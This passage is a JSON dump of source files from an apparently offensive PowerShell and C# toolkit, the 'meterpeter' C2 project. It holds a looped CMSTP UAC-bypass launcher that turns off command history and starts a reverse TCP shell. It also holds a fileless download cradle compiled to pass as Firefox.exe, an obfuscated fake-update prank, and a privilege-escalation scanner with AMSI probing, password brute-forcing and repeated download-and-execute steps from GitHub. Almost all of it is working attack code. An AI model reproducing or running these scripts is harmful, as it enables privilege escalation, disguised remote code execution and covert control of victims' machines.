after escalation.\r\n   \r\n.LINK\r\n   https://oddvar.moe/2017/08/15/research-on-cmstp-exe\r\n   https://github.com/r00t-3xp10it/redpill/blob/main/bypass/UACBypassCMSTP.ps1\r\n   https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/CMSTPTrigger.ps1\r\n#>\r\n\r\n\r\n [CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$RatLocation=\"False\",\r\n   [int]$DelayTime=\"30\",\r\n   [int]$LoopFor=\"2\"\r\n)\r\n\r\n\r\n$TryFor = $LoopFor+1\r\n$FailedExecution = \"False\"\r\n$GostavasDeSaber = \"@m_tp\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$NoStringsForYou = ($GostavasDeSaber).Replace(\"@\",\"c\").Replace(\"_\",\"s\")\r\nWrite-Host \"* Elevate session from UserLand to Administrator!\" -ForegroundColor Green\r\n\r\nIf(-not(Test-Path -Path \"$Env:TMP\\UACBypassCMSTP.ps1\"))\r\n{\r\n   #Download CmdLet from my GitHub repository into %tmp% directory.\r\n   Write-Host \"  => Downloading: UACBypassCMSTP from GitHub into %TMP% ..\" -ForeGroundColor Blue\r\n   iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/UACBypassCMSTP.ps1\" -OutFile \"$Env:TMP\\UACBypassCMSTP.ps1\"|Out-Null\r\n}\r\n\r\nIf($RatLocation -ne \"False\")\r\n{\r\n   If($RatLocation -iNotMatch '(.ps1)$')\r\n   {\r\n      $RatLocation = \"$Env:TMP\\Update-KB5005101.ps1\"\r\n      Write-Host \"  => Error: This function only accepts .PS1 scripts ..\" -ForegroundColor Red -BackgroundColor Black\r\n      Write-Host \"     => Using default value: `$Env:TMP\\Update-KB5005101.ps1`n\" -ForegroundColor Blue  \r\n   }\r\n   Else\r\n   {\r\n      #Replace RatLocation on UACBypassCMSTP cmdlet?\r\n      ((Get-Content -Path \"$Env:TMP\\UACBypassCMSTP.ps1\" -Raw) -Replace '\\$Env:TMP\\\\Update-KB5005101.ps1',\"$RatLocation\")|Set-Content -Path \"$Env:TMP\\UACBypassCMSTP.ps1\"\r\n   }\r\n}\r\nElse\r\n{\r\n   #Use default RatLocation Parameter 
declaration.\r\n   $RatLocation = \"$Env:TMP\\Update-KB5005101.ps1\"\r\n}\r\n\r\n\r\nfor($i=1; $i -lt $TryFor; $i++)\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - For() function to loop for the selected number of times.\r\n\r\n   .NOTES\r\n      The UACBypassCMSTP.ps1 CmdLet executes the Update-KB5005101.ps1\r\n      reverse tcp shell on each loop, with the selected time delay.\r\n      CmdLet will check the cm`stp process state and the CorpVpn network\r\n      adapter profile before each loop exec, to prevent the adapter gui from popping up.\r\n   #>\r\n\r\n   try{\r\n\r\n      Start-Sleep -Seconds $DelayTime\r\n      #Make sure the cms`tp process is not running!\r\n      If((Get-Process -Name $NoStringsForYou -EA silentlycontinue).Responding -Match '^(True)$')\r\n      {\r\n         Stop-Process -Name $NoStringsForYou -Force\r\n         Start-Sleep -Milliseconds 1500\r\n      }\r\n\r\n      #Make sure the CorpVpn network adapter profile is not active!\r\n      $CorpVpnAdapterState = Get-NetAdapter | ? 
{ $_.Name -like \"*CorpVpn*\" }\r\n      If(-not($CorpVpnAdapterState) -or $CorpVpnAdapterState -ieq $null)\r\n      {\r\n         #Make sure we dont have a session allready open before exec EOP again!\r\n         $readLog = Get-Content -Path \"$Env:TMP\\EOPsettings.log\" -EA SilentlyContinue\r\n         If(-not($readLog) -or $readLog -ieq $null)\r\n         {\r\n            $ShellConnection = $null\r\n         }\r\n         Else\r\n         {\r\n            $ShellConnection = netstat -ano|Findstr /C:\"$readLog\"\r\n         }\r\n\r\n         If(-not($ShellConnection) -or $ShellConnection -ieq $null)\r\n         {\r\n            #Execute EOP script without rebooting!\r\n            powershell -exec bypass -WindowStyle hidden -File \"$Env:TMP\\UACBypassCMSTP.ps1\"\r\n         }\r\n      }\r\n\r\n   }catch{$FailedExecution = \"True\"\r\n      Write-Host \"[x] Error: fail to execute '$Env:TMP\\UACBypassCMSTP.ps1' (EOP)\" -ForegroundColor Red -BackgroundColor Black\r\n      Write-Host \"`n\";exit #Exit @CMSTPTrigger\r\n   }\r\n\r\n}\r\n\r\n\r\n#Build output DataTable!\r\n$mytable = New-Object System.Data.DataTable\r\n$mytable.Columns.Add(\"MaxExec\")|Out-Null\r\n$mytable.Columns.Add(\"DelayTime\")|Out-Null\r\n$mytable.Columns.Add(\"RatLocation\")|Out-Null\r\n\r\n#Adding values to DataTable!\r\n$mytable.Rows.Add(\"$LoopFor\",         ## max eop executions\r\n                  \"$DelayTime(sec)\",  ## Looop each <int> seconds\r\n                  \"$RatLocation\"      ## rat client absoluct path\r\n)|Out-Null\r\n\r\n#Diplay output DataTable!\r\n$mytable | Format-Table -AutoSize | Out-String -Stream | ForEach-Object {\r\n   $stringformat = If($_ -Match '^(MaxExec)'){\r\n      @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n   Write-Host @stringformat $_\r\n}\r\n\r\n\r\n#Final stdout displays\r\nIf($FailedExecution -ieq \"False\")\r\n{\r\n   Write-Host \"* Exit @Meterpeter and start a new handler to recive the elevated shell.\" -ForegroundColor Green\r\n   Write-Host \"  
=> Remenber: To manual delete artifacts from 'TMP' dir after escalation.`n\" -ForegroundColor Blue\r\n   Remove-Item -Path \"$Env:TMP\\EOPsettings.log\" -Force\r\n}"
  },
  {
    "path": "mimiRatz/CScrandle_fileless.cs",
    "content": "/*\r\n   Author: @r00t-3xp10it\r\n   redpill v1.2.6 - CsOnTheFly Internal Module!\r\n\r\n   Title: StandAlone executable fileless cmdlet's download crandle.\r\n   Description: Program.cs (to be compiled to a standalone executable) that allows users to download\\execute URL cmdlets filelessly\r\n      \r\n   Dependencies: iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/CsOnTheFly.ps1\" -OutFile \"CsOnTheFly.ps1\"\r\n   Compile: .\\CsOnTheFly.ps1 -action \"compile\" -uri \"CScrandle_fileless.cs\" -outfile \"Firefox.exe\" -filedescription \"@Mozilla FireFox\" -iconset \"true\"\r\n*/\r\n\r\nusing System.Diagnostics;\r\nnamespace Console\r\n{\r\n    class Program\r\n    {\r\n        static void Main(string[] args)\r\n        {\r\n           var filePath = @\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\";\r\n\r\n           Process process = new Process();\r\n           process.StartInfo.FileName = filePath;\r\n           process.StartInfo.Arguments = \"$Proxy=New-Object -ComObject MsXml2.ServerXmlHttp;$Proxy.Open('GET','https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/test.ps1',0);$Proxy.Send();[scriptblock]::Create($Proxy.ResponseText).Invoke()\";\r\n           process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;\r\n           process.Start();\r\n        }\r\n    }\r\n}"
  },
  {
    "path": "mimiRatz/FWUprank.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Fake Windows Update Prank\r\n\r\n   Author: @r00t-3xp10it (ssa redteam)\r\n   Tested Under: Windows 10 (19044) x64 bits\r\n   Required Dependencies: none\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v1.0.5\r\n\r\n.DESCRIPTION\r\n   Auxiliary module of Meterpeter C2 v2.10.13 that executes an prank in background.\r\n   The prank opens the default web browser in fakeupdate.net website in full screen\r\n   mode. To abort the prank target user requires to manual press {F11} on is keyboard.\r\n\r\n.NOTES\r\n   This cmdlet gets the default web browser name\\path\\command and operative system\r\n   version number (to select fakeupdate.net correct wallpaper) before download and\r\n   invoking sendkeys.ps1 cmdlet that opens fakeupdate.net website in full screen mode.\r\n   sendkeys.ps1 cmdlet its invoked to send keyboard keys to the browser {Enter + F11}\r\n\r\n.Parameter AutoDelete\r\n   Auto-Delete this cmdlet in the end? (default: off)\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\FWUprank.ps1\r\n\r\n.EXAMPLE\r\n   PS C:\\> powershell -file FWUprank.ps1\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\FWUprank.ps1 -autodelete 'on'\r\n   Auto-Delete this cmdlet in the end\r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into FWUprank.ps1\r\n\r\n.OUTPUTS\r\n   * Send Keys to running programs\r\n     + Start and capture process info.\r\n     + Success, sending key: 'https://fakeupdate.net/win11/~{F11}'\r\n     + Process PID: '11864'\r\n   * Exit sendkeys cmdlet execution ..\r\n   \r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$AutoDelete=\"off\"  #autodelete cmdlet in the end\r\n)\r\n\r\n\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Store operative system version\r\n$OsVersion = [System.Environment]::OSVersion.Version.Major\r\nIf([string]::IsNullOrEmpty($OsVersion))\r\n{\r\n   write-host \"`n    x\" -ForegroundColor Red -NoNewline\r\n   write-host \" fail to get operative sistem version number ...`n\" -ForegroundColor DarkGray\r\n   return\r\n}\r\n\r\n\r\n#Store default web browser name\r\n$RegexDecode = (([regex]::Matches(\"ecioh@Cre@sU\\pt@th\\sno@ita@icos@sAlrU\\snoita@ico@ssA\\lle@hS\\swod@niW\\tf@os@orciM\\ERA@WTF@OS\\:UCK@H\",'.','RightToLeft')|ForEach{$_.value}) -join '')\r\n$DefaultSettingPath = \"$RegexDecode\" -replace '@',''\r\n$DefaultBrowserName = (Get-Item -Path \"$DefaultSettingPath\"|Get-ItemProperty).ProgId\r\nIf([string]::IsNullOrEmpty($DefaultBrowserName))\r\n{\r\n   write-host \"`n    x\" -ForegroundColor Red -NoNewline\r\n   write-host \" fail to get default web browser name ...`n\" -ForegroundColor DarkGray\r\n   return\r\n}\r\n\r\n\r\n#Create PSDrive to HK`EY_CL`ASSES_RO`OT\r\n$ShellCommand = \"`$n£u@l£l = N@e£w-£P@SD£ri@ve -P£SP@ro£vid@er r£eg@ist@ry -£Ro@o£t 'H£K@EY_£C@LAS£SE@S_£RO@O@T' -N@a@me 'H£K@C£R'\" -replace '(@|£)',''\r\n$ShellCommand|&('XeX' -replace '^(X)','i')\r\n\r\n#Get the default browser executable command/path\r\n$TestMeNpw = \"£H@KC£R@:\\$DefaultBrowserName\\£s@hel@l\\£o@pe@n\\c£om@ma£n@d\" -replace '(@|£)',''\r\n$DefaultBrowserOpenCommand = (Get-Item 
\"$TestMeNpw\"|Get-ItemProperty).'(default)'\r\n$DefaultBrowserPathSanitize = [regex]::Match($DefaultBrowserOpenCommand,'\\\".+?\\\"')\r\nRemove-PSDrive -Name 'HKCR'\r\n\r\nIf([string]::IsNullOrEmpty($DefaultBrowserPathSanitize))\r\n{\r\n   write-host \"`n    x\" -ForegroundColor Red -NoNewline\r\n   write-host \" fail to get default browser executable command/path...`n\" -ForegroundColor DarkGray\r\n   return\r\n}\r\n\r\n#Sanitize command\r\n$DefaultBrowserPath = $DefaultBrowserPathSanitize.value -replace '\"',''\r\n$SendKeyscmdlet = \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/sendkeys.ps1\"\r\n\r\n#Select the OS version to run\r\nIf($OsVersion -match '^(xp)$')\r\n{\r\n   $SystemId = \"xp\"\r\n}\r\nElseIf($OsVersion -match '^(7)$')\r\n{\r\n   $SystemId = \"win7\"\r\n}\r\nElseIf($OsVersion -match '^(10)$')\r\n{\r\n   $SystemId = \"win10ue\"\r\n}\r\nElseIf($OsVersion -match '^(11)$')\r\n{\r\n   $SystemId = \"win11\"\r\n}\r\nElse\r\n{\r\n   $SystemId = \"win11\"\r\n}\r\n\r\n#Download sendkes cmdlet from github\r\niwr -uri \"$SendKeyscmdlet\" -OutFile \"sendkeys.ps1\"\r\n#Execute sendkeys cmdlet to open default browser in fakeupdate.net in full windows mode\r\n.\\sendkeys.ps1 -Program \"$DefaultBrowserPath\" -SendKey \"https://fakeupdate.net/$SystemId/~{F11}\"\r\n\r\n#CleanUp\r\nRemove-Item -Path \"sendkeys.ps1\" -Force\r\nIf($AutoDelete -iMatch '^(on)$')\r\n{\r\n   #Auto Delete this cmdlet in the end ...\r\n   Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}"
  },
  {
    "path": "mimiRatz/FindEop.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Search for Escalation Of privileges Entrys [local]\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19044) x64 bits\r\n   Required Dependencies: Invoke-WebRequest {native}\r\n   Optional Dependencies: ACLMitreT1574.ps1, Sherlock.ps1 {download}\r\n   PS cmdlet Dev version: v2.3.28\r\n\r\n.DESCRIPTION\r\n   Auxiliary module of @Meterpeter C2 v2.10.14 FindEOP module, That allow users to search\r\n   for possible Escalation Of Privileges entrys [local] using diferent documented technics.\r\n   https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources\r\n\r\n.NOTES\r\n   Parameter -bruteforce 'true' brute forces active user account password, while -bruteforce 'pedro'\r\n   brute forces the 'pedro' user account password. If you wish to use your own dicionary file then\r\n   create it in %tmp% directory under the name 'passwords.txt' that bruteforce function will use it.\r\n\r\n   Download\\Execute FindEOP.ps1 CmdLet:\r\n   iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1\" -outfile \"FindEOP.ps1\";.\\FindEOP.ps1\r\n\r\n.Parameter Verb\r\n   Use agressive scans? [slower] (default: false)\r\n\r\n.Parameter BruteForce\r\n   Brute force user account password? (default: false)\r\n  \r\n.EXAMPLE\r\n   PS C:\\> .\\FindEop.ps1\r\n   Default scan takes 3 minuts to finish\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\FindEop.ps1 -verb 'true'\r\n   Agressive scan takes 6 minuts to finish\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\FindEop.ps1 -bruteforce 'true'\r\n   Scans for EOP and brute force user account pass\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\FindEop.ps1 -bruteforce 'pedro'\r\n   Scans for EOP and brute force pedro account pass\r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into FindEop.ps1\r\n\r\n.OUTPUTS\r\n   Privilege Name                Description                                   State\r\n   ============================= ============================================= ========\r\n   SeAssignPrimaryTokenPrivilege Replace a process-level token                 Disabled\r\n   SeShutdownPrivilege           Shut down the system                          Disabled\r\n   SeChangeNotifyPrivilege       Ignore cross scan                             Enabled\r\n   SeUndockPrivilege             Remove computer from docking station          Disabled\r\n   SeIncreaseWorkingSetPrivilege Augment a working set of processes            Disabled\r\n   SeTimeZonePrivilege           Change time zone                              Disabled\r\n\r\n\r\n   DIRECTORYS WITH 'FULLCONTROLL, MODIFY' PERMISSIONS\r\n   --------------------------------------------------\r\n   VulnId            : 1::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Battle.net\r\n   FileSystemRights  : FullControl\r\n   IdentityReference : BUILTIN\\Users\r\n   IsInherited       : False\r\n\r\n   VulnId            : 2::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Resource Hacker\r\n   FileSystemRights  : FullControl\r\n   IdentityReference : Everyone\r\n   IsInherited       : False\r\n   \r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n   https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$BruteForce=\"false\",\r\n   [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n#Local variables\r\n$BatVersion = \"v2.3.28\"\r\n$LocalPath = (Get-Location).Path\r\n#Demonstration logfile with credentials in cleartext\r\necho \"Logfile created by @FindEop\" > $Env:TMP\\ObeeRkiE.log\r\necho \"username: @FindEop_Demonstration\" >> $Env:TMP\\ObeeRkiE.log\r\necho \"password: myS3cR3T_In_ClearText\" >> 
$Env:TMP\\ObeeRkiE.log\r\n$host.UI.RawUI.WindowTitle = \"FindEop $BatVersion {SSA RedTeam @2024}\"\r\n#Spirit of Heaven, Goddess of Fire and Life!\r\n$Banner = @\"\r\n\r\n                                                         \\  /\r\n                                                        (())\r\n                                                         ,~L_\r\n                                                        2~~ ^<\\\r\n                                                        )^>-\\y(((GSSsss _$BatVersion\r\n                       __________________________________)v_\\__________________________________\r\n                      (_// / / / (///////\\3__________((_/      _((__________E/\\\\\\\\\\\\\\) \\ \\ \\ \\\\_)\r\n                        (_/ / / / (////////////////////(c  (c /^|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\) \\ \\ \\ \\_)\r\n                         \"(_/ / / /(/(/(/(/(/(/(/(/(/(/\\_    /\\)\\)\\)\\)\\)\\)\\)\\)\\)\\)\\ \\ \\ \\_)\"\r\n                            \"(_/ / / / / / / / / / / / /|___/\\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\ \\_)\"\r\n                               \"(_(_(_(_(_(_(_(_(_(_(_(_[_]_|_)_)_)_)_)_)_)_)_)_)_)_)\"\r\n                                                        ^|    \\\r\n                                                       / /   /___\r\n                                                      / /         '~~~~~__.\r\n                                                      \\_\\_______________\\_'_?\r\n                                          Spirit of Heaven, Goddess of Fire and Life\r\n                                    Methodology: https://shorturl.at/oJRV0 {@swisskyrepo}\r\n\r\n\r\n\"@;\r\nWrite-Host $Banner\r\n## CmdLet Banner Timeout\r\nStart-Sleep -Seconds 2\r\n\r\n\r\n$FucOrNot = \"£SY@S£T£E@M @IN£F@OR£MA@TI£O@N\" -replace '(@|£)',''\r\nWrite-Host \"$FucOrNot\"\r\nWrite-Host \"------------------\"\r\n$FucOrNot = \"s@y£st£e@min£@fo£ @>£ s@y£st@e£mi@nf£o.@t£x@t\" -replace '(@|£)',''\r\n$FucOrNot|&('Rex' 
-replace 'R','i')\r\n$FucOrNot = \"s@y£st£e@min£@fo£.t@xt£\" -replace '(@|£)',''\r\nGet-Content $FucOrNot|findstr \"Host OS Registered Owner: Locale:\"|findstr /V /C:\"Registered Organization:\"|findstr /V /C:\"BIOS Version:\"|findstr /V /C:\"OS Build Type:\"|findstr /V /C:\"Input Locale:\"\r\nRemove-Item -path $FucOrNot -Force\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List UAC settings\r\nWrite-Host \"USER ACCOUNT CONTROL\"\r\nWrite-Host \"--------------------\"                \r\n$RawPolicyKey = 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system';\r\n$UacStatus = (Get-Itemproperty -path $RawPolicyKey).EnableLUA;\r\n$ConsentPromptBehaviorUser = (Get-Itemproperty -path $RawPolicyKey).ConsentPromptBehaviorUser;\r\n$ConsentPromptBehaviorAdmin = (Get-Itemproperty -path $RawPolicyKey).ConsentPromptBehaviorAdmin;\r\n\r\nIf($UacStatus -eq 0)\r\n{\r\n   Write-Host \"UAC Status                 : Disabled REG_DWORD 0x0\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElseIf($UacStatus -eq 1)\r\n{\r\n   Write-Host \"UAC Status                 : Enabled REG_DWORD 0x1\" -ForeGroundColor Red\r\n}\r\n\r\nIf($ConsentPromptBehaviorAdmin -eq 5 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n   Write-Host \"UAC Settings               : Notify Me (a:0x5|u:0x3)\" -ForegroundColor Yellow\r\n}\r\nElseIf($ConsentPromptBehaviorAdmin -eq 0 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n   Write-Host \"UAC Settings               : Never Notify (a:0x0|u:0x3)\" -ForeGroundColor Green -BackGroundColor Black\r\n}\r\nElseIf($ConsentPromptBehaviorAdmin -eq 2 -and $ConsentPromptBehaviorUser -eq 3)\r\n{\r\n   Write-Host \"UAC Settings               : Allways Notify (a:0x2|u:0x3)\" -ForeGroundColor Red -BackGroundColor Black\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\nIf($Verb -ieq \"True\")\r\n{\r\n   #List Anti-Virus Info\r\n   Write-Host \"ANTI-VIRUS DEFINITIONS\"\r\n   Write-Host \"----------------------\"\r\n   iwr -Uri 
\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Get-AVStatus.ps1\" -OutFile \"$Env:TMP\\Get-AVStatus.ps1\"|Unblock-File;\r\n   powershell -File \"$Env:TMP\\Get-AVStatus.ps1\";Remove-Item -Path \"$Env:TMP\\Get-AVStatus.ps1\" -Force\r\n   Write-Host \"`n\"\r\n\r\n   #What processes loaded am`si.dl`l?\r\n   Write-Host \"PROCESSES THAT LOAD AMS`I.DL`L\" \r\n   Write-Host \"----------------------------\"\r\n   $ParseData = \"@m`s`i.d!!\" #Obfucate am`si.dll API call\r\n   $ObfuscatedAPI = $ParseData -replace '@','a' -replace '!','l'\r\n   ps | Where-Object {\r\n      $_.Modules.ModuleName -contains \"$ObfuscatedAPI\"\r\n   }|Select-Object Handles,NPM,PM,WS,CPU,SI,ProcessName,@{Name='Loaded DLL';Expression={\"$ObfuscatedAPI\"}}|Format-Table -AutoSize|Out-String -Stream|Select-Object -Skip 1\r\n}\r\n\r\n\r\n#List UserPrivs\r\nWrite-Host \"USER INFORMATION\"\r\nWrite-Host \"----------------\"\r\nwhoami /user|Format-Table|Out-String -Stream|Select-Object -Skip 4\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List Local Groups\r\nWrite-Host \"LIST LOCAL GROUPS\"\r\nWrite-Host \"-----------------\"\r\nGet-LocalGroup|Select-Object Name,SID,PrincipalSource|Format-table -AutoSize|Out-String -Stream|Select-Object -Skip 1|ForEach-Object {\r\n   $stringformat = If($_ -iMatch '^(Administra)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Yellow' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\n\r\n\r\n#List HotFixes\r\nWrite-Host \"LIST HOTFIXES INSTALLED\"\r\nWrite-Host \"-----------------------\"\r\nGet-HotFix|Select-Object Description,HotFixID,InstalledBy,InstalledOn|Format-table -AutoSize|Out-String -Stream|Select-Object -Skip 1|Select-Object -SkipLast 1|ForEach-Object {\r\n   $stringformat = If($_ -iMatch '^(Security Update)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Yellow' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\nWrite-Host 
\"\"\r\n\r\n\r\n#List Privileges\r\nWrite-Host \"PRIVILEGES INFORMATION\"\r\nWrite-Host \"----------------------\"\r\nwhoami /priv|Format-Table|Out-String -Stream|Select-Object -Skip 4|ForEach-Object {\r\n   $stringformat = If($_ -iMatch '(Enabled)')\r\n   {\r\n      @{ 'ForegroundColor' = 'Green' }\r\n   }\r\n   Else\r\n   {\r\n      @{ 'ForegroundColor' = 'White' }\r\n   }\r\n   Write-Host @stringformat $_\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Abusing the golden privileges\r\nWrite-Host \"JUICY POTATO GOLDEN PRIVILEGES\"\r\nWrite-Host \"[i] vulnerable priv if shell is running with low privileges\" -ForeGroundColor Yellow\r\nWrite-Host \"-----------------------------------------------------------\"\r\nIf($Verb -ieq \"False\")\r\n{\r\n   $juicy = whoami /priv|findstr /i /C:'SeImpersonatePrivileges' /i /C:'SeAssignPrimaryTokenPrivilege'|findstr /i /C:'Enabled';\r\n   If(-not($juicy))\r\n   {\r\n      write-host \"[GOLDEN] None vulnerable token privileges found.\"\r\n   }\r\n   Else\r\n   {\r\n      Write-Host $juicy -ForeGroundColor Green\r\n   }\r\n}\r\nElse\r\n{\r\n   #NOTE: FindEop.ps1 -verb 'true' - triggers more elaborated checks (slower)\r\n   New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT|Out-Null;\r\n   $CLSID = (Get-ItemProperty HKCR:\\clsid\\* | Select-Object * | Where-Object {\r\n      $_.appid -ne $null}).PSChildName|Select -Last 2;ForEach($a in $CLSID)\r\n      {\r\n         Write-Host \"[CLSID:] $a\" -ForegroundColor DarkGray\r\n      }\r\n      $juicy = whoami /priv|findstr /i /C:'SeImpersonatePrivileges' /i /C:'SeAssignPrimaryTokenPrivilege'|findstr /i /C:'Enabled';\r\n      If(-not($juicy))\r\n      {\r\n         write-host \"[GOLDEN] None vulnerable token privileges found.\" -ForeGroundColor Red\r\n      }\r\n      Else\r\n      {\r\n         Write-Host $juicy -ForeGroundColor Green\r\n      }\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Rotten Potato Silver Privileges\r\nwrite-host \"ROTTEN POTATO SILVER PRIVILEGES\"\r\nWrite-Host 
\"[i] vulnerable priv if shell is running with low privileges\" -ForeGroundColor Yellow\r\nwrite-host \"-----------------------------------------------------------\"\r\n$RottenPotato = whoami /priv|findstr /C:'SeImpersonatePrivilege' /C:'SeAssignPrimaryPrivilege' /C:'SeTcbPrivilege' /C:'SeBackupPrivilege' /C:'SeRestorePrivilege' /C:'SeCreateTokenPrivilege' /C:'SeLoadDriverPrivilege' /C:'SeTakeOwnershipPrivilege' /C:'SeDebugPrivileges'|findstr /C:'Enabled';\r\nIf(-not($RottenPotato))\r\n{\r\n   write-host \"[SILVER] None vulnerable token privileges found.\"\r\n}\r\nElse\r\n{\r\n   Write-Host $RottenPotato -ForeGroundColor Green\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Check For Named Pipes\r\nwrite-host \"CHECK FOR NAMED PIPES\"\r\n#[System.IO.Directory]::GetFiles(\"\\\\.\\pipe\\\")\r\n#Check for Named Pipes. This can be exploited to obtain the privileges of a process connecting to them.\r\nIf($Verb -ieq \"False\")\r\n{\r\n   Write-Host \"[i] First 5 pipes found.\" -ForeGroundColor Yellow\r\n   Write-Host \"------------------------\"\r\n   $CheckPipes = (Get-ChildItem \\\\.\\pipe\\ -EA SilentlyContinue).FullName;\r\n   If($CheckPipes)\r\n   {\r\n      Write-Host \"[VULNERABLE::T1574]\" -ForeGroundColor Green -BackGroundColor Black;\r\n      $Report = $CheckPipes|Select -Skip 1|Select -First 5;echo $Report\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"ERROR: None Name Pipes found ..\"\r\n   }\r\n}\r\nElse\r\n{\r\n   Write-Host \"[i] First 10 pipes found.\" -ForeGroundColor Yellow\r\n   Write-Host \"-------------------------\"\r\n   $CheckPipes = (Get-ChildItem \\\\.\\pipe\\ -EA SilentlyContinue).FullName;\r\n   If($CheckPipes)\r\n   {\r\n      Write-Host \"[VULNERABLE::T1574]\" -ForeGroundColor Green -BackGroundColor Black;\r\n      $Report = $CheckPipes|Select -Skip 1|Select -First 10;echo $Report\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"ERROR: None Name Pipes found ..\"\r\n   }\r\n}\r\nwrite-host \"`n\"\r\n\r\n\r\n#Environement Paths\r\nWrite-Host 
\"ENVIRONEMENT PATHS\"\r\nWrite-Host \"------------------\"\r\n($Env:Path) -Split ';'\r\nWrite-Host \"`n\"\r\n\r\n\r\n#Environement paths entries permissions\r\nWrite-Host \"SCANNING ENVIRONEMENT PATHS PERMISSIONS\"\r\nWrite-Host \"[i] Place exe or DLL to exec instead of legitimate\" -ForeGroundColor Yellow\r\nWrite-Host \"--------------------------------------------------\"\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/ACLMitreT1574.ps1\" -OutFile \"$Env:TMP\\ACLMitreT1574.ps1\"|Unblock-File\r\nIf($Verb -ieq \"False\")\r\n{\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action path -Egg true\r\n}\r\nElse\r\n{\r\n   #NOTE: FindEop.ps1-verb 'true' - triggers more elaborated checks (slower)\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action path -extraGroup true -extraperm true -Egg true\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#User Directorys with fullCONTROL or modify permisions\r\nIf($verb -ieq \"False\")\r\n{\r\n   Write-Host \"DIRECTORYS WITH 'FULLCONTROLL, MODIFY' PERMISSIONS\"\r\n   Write-Host \"[i] Scanning All %PROGRAMFILES% directorys recursive ....\" -ForeGroundColor Yellow\r\n   Write-Host \"---------------------------------------------------------\"\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action dir -Egg true\r\n}\r\nElse\r\n{\r\n   Write-Host \"DIRECTORYS WITH 'FULLCONTROLL, MODIFY, WRITE' PERMISSIONS\"\r\n   Write-Host \"[i] Scanning All %PROGRAMFILES% directorys recursive ....\" -ForeGroundColor Yellow\r\n   Write-Host \"---------------------------------------------------------\"\r\n   powershell -File $Env:TMP\\ACLMitreT1574.ps1 -action dir -extraGroup true -extraperm true -Egg true\r\n}\r\nWrite-Host \"`n\"\r\n\r\n\r\n#List Unquoted Service Paths\r\nWrite-Host \"SEARCHING FOR UNQUOTED SERVICE PATHS\"\r\nWrite-Host \"------------------------------------\"\r\niwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Sherlock.ps1\" -OutFile 
